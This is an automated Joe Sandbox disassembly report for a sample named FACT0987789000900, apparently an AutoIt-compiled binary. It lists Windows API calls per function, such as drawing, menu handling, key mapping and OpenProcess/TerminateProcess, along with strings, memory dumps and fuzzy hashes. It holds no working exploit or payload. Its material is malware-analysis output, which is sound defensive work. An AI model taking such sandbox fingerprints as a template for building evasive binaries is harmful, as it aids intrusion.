Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AAFF2
Part of subcall function 004AAF83: BeginPath.GDI32(?), ref: 004AB009
Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AB033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 004FEC20
LineTo.GDI32(00000000,00000003,?), ref: 004FEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004FEC42
LineTo.GDI32(00000000,00000000,?), ref: 004FEC52
EndPath.GDI32(00000000), ref: 004FEC62
StrokePath.GDI32(00000000), ref: 004FEC72

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 0565c5884e80c2cd6f595dfbe2d624ac179b04d6f7b44861d422b5b5797e3a2b
Instruction ID: 000f8402d457b1374e7d7b9a7f5e684a7b73d8dfbd7dfc6dcf76112668ae382a
Opcode Fuzzy Hash: 0565c5884e80c2cd6f595dfbe2d624ac179b04d6f7b44861d422b5b5797e3a2b
Instruction Fuzzy Hash: A811057600014DBFEB029F90DC88EEA7F6DEB18355F048122BE088A160D7719E59EBA4

Function 004CE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004CE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 004CE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004CE1D8
ReleaseDC.USER32(00000000,00000000), ref: 004CE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 004CE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 004CE209

Part of subcall function 004C9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004C9A05,00000000,00000000,?,004C9DDB), ref: 004CA53A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 3fdfa1bb0a4850b7556797618e23b999b8d621f4ab9103ed27b735cf609be921
Instruction ID: 683d5ba45e211ee30fc22a60622e01681fc36e8eb9a6ee8882ec27f3d6f563b7
Opcode Fuzzy Hash: 3fdfa1bb0a4850b7556797618e23b999b8d621f4ab9103ed27b735cf609be921
Instruction Fuzzy Hash: C70188B5A40714BFEB105BA68C45F5EBF78EB58351F048066E904A7390DA719C00DF60

Function 004B7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 004B7B47

Part of subcall function 004B123A: __initp_misc_winsig.LIBCMT ref: 004B125E
Part of subcall function 004B123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004B7F51
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004B7F65
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004B7F78
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004B7F8B
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004B7F9E
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004B7FB1
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004B7FC4
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004B7FD7
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004B7FEA
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004B7FFD
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004B8010
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004B8023
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004B8036
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004B8049
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004B805C
Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004B806F

__mtinitlocks.LIBCMT ref: 004B7B4C

Part of subcall function 004B7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0054AC68,00000FA0,?,?,004B7B51,004B5E77,00546C70,00000014), ref: 004B7E41

__mtterm.LIBCMT ref: 004B7B55

Part of subcall function 004B7BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004B7D3F
Part of subcall function 004B7BBD: _free.LIBCMT ref: 004B7D46
Part of subcall function 004B7BBD: RtlDeleteCriticalSection.NTDLL(0054AC68), ref: 004B7D68

__calloc_crt.LIBCMT ref: 004B7B7A
GetCurrentThreadId.KERNEL32 ref: 004B7BA3

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 6cc25b163431a8d5183549f5598ee6f8470d497cd79ce0d25a656b53c565aa61
Instruction ID: ecee7eebfd3a2e4fd107da6f6825dff911204f93890ab9269623e7a2b1edde23
Opcode Fuzzy Hash: 6cc25b163431a8d5183549f5598ee6f8470d497cd79ce0d25a656b53c565aa61
Instruction Fuzzy Hash: 77F0963214D31119E76877757C06ACB2694DF8273CB20069FF864D52D2FF2C9942597D

Function 004927EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0049281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00492825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00492830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0049283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00492843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0049284B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9b53cd075a24e8ed8bdffc65940050c0e50597592151d7c52f2935a742c8ee9e
Instruction ID: 8a09c1db04b17d8cabe042e1c1c52dfde04ed2f975bd89169c9ed6d3143fc178
Opcode Fuzzy Hash: 9b53cd075a24e8ed8bdffc65940050c0e50597592151d7c52f2935a742c8ee9e
Instruction Fuzzy Hash: FE0167B0902B5ABDE3009F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A868CBE5

Function 004D9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 9ca4dac0bd4c47c6f4774f3a0d8721e6a7abaae3bef536eddd12febb1ce4eda7
Instruction ID: db399a48c4be2609852f4bc28372d16077933a3cab1bea6035ed39dc7590d39f
Opcode Fuzzy Hash: 9ca4dac0bd4c47c6f4774f3a0d8721e6a7abaae3bef536eddd12febb1ce4eda7
Instruction Fuzzy Hash: 8D018136202222ABDB191B54EC58EEB777AFF98701B04452BF513D23A0DB789C04EB64

Function 004D7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004D7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004D7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 004D7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004D7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004D7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004D7C4C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: c355f21ed7f91aa2fc6e106322e09523d7993cb2f79a793ca54fd615e653fc7e
Instruction ID: 50aeb86a4dce37b7f6ae4011f5677e4f270ac749f902bf6b2fadce5a9e99a7c4
Opcode Fuzzy Hash: c355f21ed7f91aa2fc6e106322e09523d7993cb2f79a793ca54fd615e653fc7e
Instruction Fuzzy Hash: 39F09A72241158BBE7201B529C0EEEF3B7CEFD6B11F004019FA0191050E7A41A49E6B5

Function 004D9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 004D9A33
RtlEnterCriticalSection.NTDLL(?), ref: 004D9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00505DEE,?,?,?,?,?,0049ED63), ref: 004D9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00505DEE,?,?,?,?,?,0049ED63), ref: 004D9A5E

Part of subcall function 004D93D1: CloseHandle.KERNEL32(?,?,004D9A6B,?,?,?,00505DEE,?,?,?,?,?,0049ED63), ref: 004D93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 004D9A71
RtlLeaveCriticalSection.NTDLL(?), ref: 004D9A78

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7ce8c73f8e575877ac3acba91d067c99a54dadb6f5ca011313a38e88eb38ec86
Instruction ID: 86b9ff146701e89e49feeeea50b1d31d8c32f094b93d7148f97709083a30293e
Opcode Fuzzy Hash: 7ce8c73f8e575877ac3acba91d067c99a54dadb6f5ca011313a38e88eb38ec86
Instruction Fuzzy Hash: 54F08236141211ABD7111BA4EC8DDEF777AFF98301B144526F523D22A0DB799C05EB70

Function 00491CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 004AF4EA: std::exception::exception.LIBCMT ref: 004AF51E
Part of subcall function 004AF4EA: __CxxThrowException@8.LIBCMT ref: 004AF533

__swprintf.LIBCMT ref: 00491EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00491D49

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 5767c3bdee235b5a274b0ecbc7da8876c43910e332d8f308e528b22721073a67
Instruction ID: 7ad9100a1eff3fc6db5ae7fbb4a1fcd7059a0d00c51955895d8a83c392be742e
Opcode Fuzzy Hash: 5767c3bdee235b5a274b0ecbc7da8876c43910e332d8f308e528b22721073a67
Instruction Fuzzy Hash: AC91AF71104201AFCF24EF25C895C6EBFA4BF86704F00492EF885972A1DB74ED05CB96

Function 004EAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004EB006
CharUpperBuffW.USER32(?,?), ref: 004EB115
VariantClear.OLEAUT32(?), ref: 004EB298

Part of subcall function 004D9DC5: VariantInit.OLEAUT32(00000000), ref: 004D9E05
Part of subcall function 004D9DC5: VariantCopy.OLEAUT32(?,?), ref: 004D9E0E
Part of subcall function 004D9DC5: VariantClear.OLEAUT32(?), ref: 004D9E1A

Strings

AUTOIT.ERROR, xrefs: 004EB11B
Incorrect Parameter format, xrefs: 004EB03E, 004EB20B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 456fe3b623c6c03858777a066329cc91e47b13ff2fb343c1f35d6d5103380235
Instruction ID: 6fd8e24457408158f8a13d847103116bf5f89014a3fea2a5349e6cf157ed87d0
Opcode Fuzzy Hash: 456fe3b623c6c03858777a066329cc91e47b13ff2fb343c1f35d6d5103380235
Instruction Fuzzy Hash: 8A917B346043419FCB10DF66C49595BBBE4EF89704F04486EF88A9B361DB35ED05CB96

Function 004D5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004AC6F4: _wcscpy.LIBCMT ref: 004AC717

_memset.LIBCMT ref: 004D5438
GetMenuItemInfoW.USER32(?), ref: 004D5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004D5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004D553D

Strings

0, xrefs: 004D5430

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 624a2dc21d7876e1bf3b45df2ea2a4aca0ccb066e952b366423b993c28eb57c2
Instruction ID: 9c5b6ee8fb9267d7dcb9f24a45fa283ab711035088389b91ee9a90453d0b4d84
Opcode Fuzzy Hash: 624a2dc21d7876e1bf3b45df2ea2a4aca0ccb066e952b366423b993c28eb57c2
Instruction Fuzzy Hash: C6513231204701ABD7159F28D8647ABBBE9EF95354F04062FF895C3390DF68CD448B5A

Function 004D0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004D027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004D02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004D02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004D0344

Strings

DllGetClassObject, xrefs: 004D02B7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 5d0ae4bedae08c50cce91389e09ae840595d135b650fa5f212e2ba7cb7b0b28f
Instruction ID: c1897990c14fe612effaba70ce89e6404e1fa164fa338b59ff0788ff0921234d
Opcode Fuzzy Hash: 5d0ae4bedae08c50cce91389e09ae840595d135b650fa5f212e2ba7cb7b0b28f
Instruction Fuzzy Hash: 67414A71600204AFDB09CF64C8A5B9A7BB9EF44314F1480ABED099F306D7B9D945CBA4

Function 004D5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004D5075
GetMenuItemInfoW.USER32 ref: 004D5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 004D50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00551708,00000000), ref: 004D5120

Strings

0, xrefs: 004D506D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 852bc1ee173de16cbf24b752f00a1b26b8305ef7b3f793407c3984fe698f56fc
Instruction ID: 936e9bb61eaba3086aa0ff05ac023a240f2d292e985d76c9ea0fdb1333633852
Opcode Fuzzy Hash: 852bc1ee173de16cbf24b752f00a1b26b8305ef7b3f793407c3984fe698f56fc
Instruction Fuzzy Hash: 9341AE316047019FD7209F29D895B6BB7E8AF85318F044A1FF89597391DB38E804CB6A

Function 004F0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 004F0587

Strings

winapi, xrefs: 004F05F8
cdecl, xrefs: 004F05DE
none, xrefs: 004F0662
stdcall, xrefs: 004F0609

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 3637e32f593a877e807c28eb39dfcf6bee2722033767ac90a458546ec6c33746
Instruction ID: db8da1af815b0d2d86fd1eaf058fba4aae1f9d31bee959082a7f2f46053a4af8
Opcode Fuzzy Hash: 3637e32f593a877e807c28eb39dfcf6bee2722033767ac90a458546ec6c33746
Instruction Fuzzy Hash: 6F31C17050021AABCF00EF55C9519FEB7B4FF95318B00862FE826A72D2DB79A905CB84

Function 004CB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004CB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004CB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 004CB8D1

Strings

ListBox, xrefs: 004CB84D
ComboBox, xrefs: 004CB815

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

